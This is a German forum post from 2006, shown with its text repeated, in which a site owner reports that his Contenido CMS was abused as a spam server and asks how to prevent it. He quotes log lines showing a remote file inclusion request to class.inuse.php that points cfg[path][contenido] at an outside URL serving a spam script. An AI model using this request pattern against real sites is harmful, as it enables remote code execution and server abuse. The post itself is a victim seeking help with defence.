Contenido als Spam-Server missbraucht!
Verfasst: Sa 8. Apr 2006, 14:43
Hallo zusammen,
mein Provider (all-inkl) machte mich darauf aufmerksam, dass Contenido bei mir als Spam-Server missbraucht wurde.
Der Spammer benutzt dazu die Datei /contenido/classes/class.inuse.php
Mittels POST wird wohl die Variable cfg[path][contenido] neu gesetzt.
Hier ein Auszug aus den Log-Dateien (<xxx> ist meine Domain):
"POST
/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.corey.kit
.net/http.txt? HTTP/1.0" 200 108050
"http://<xxx>/contenido/classes/class.inuse.php?cfg[path][co
ntenido]=http://www.corey.kit.net/http.txt?" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.0)"
Unter der Adresse http://www.corey.kit.net/http.txt wartet dann ein Spamscript das auf meinem Server ausgeführt wird.
Wie kann ich das verhindern? Durch einen Referrer-Check?
mein Provider (all-inkl) machte mich darauf aufmerksam, dass Contenido bei mir als Spam-Server missbraucht wurde.
Der Spammer benutzt dazu die Datei /contenido/classes/class.inuse.php
Mittels POST wird wohl die Variable cfg[path][contenido] neu gesetzt.
Hier ein Auszug aus den Log-Dateien (<xxx> ist meine Domain):
"POST
/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.corey.kit
.net/http.txt? HTTP/1.0" 200 108050
"http://<xxx>/contenido/classes/class.inuse.php?cfg[path][co
ntenido]=http://www.corey.kit.net/http.txt?" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.0)"
Unter der Adresse http://www.corey.kit.net/http.txt wartet dann ein Spamscript das auf meinem Server ausgeführt wird.
Wie kann ich das verhindern? Durch einen Referrer-Check?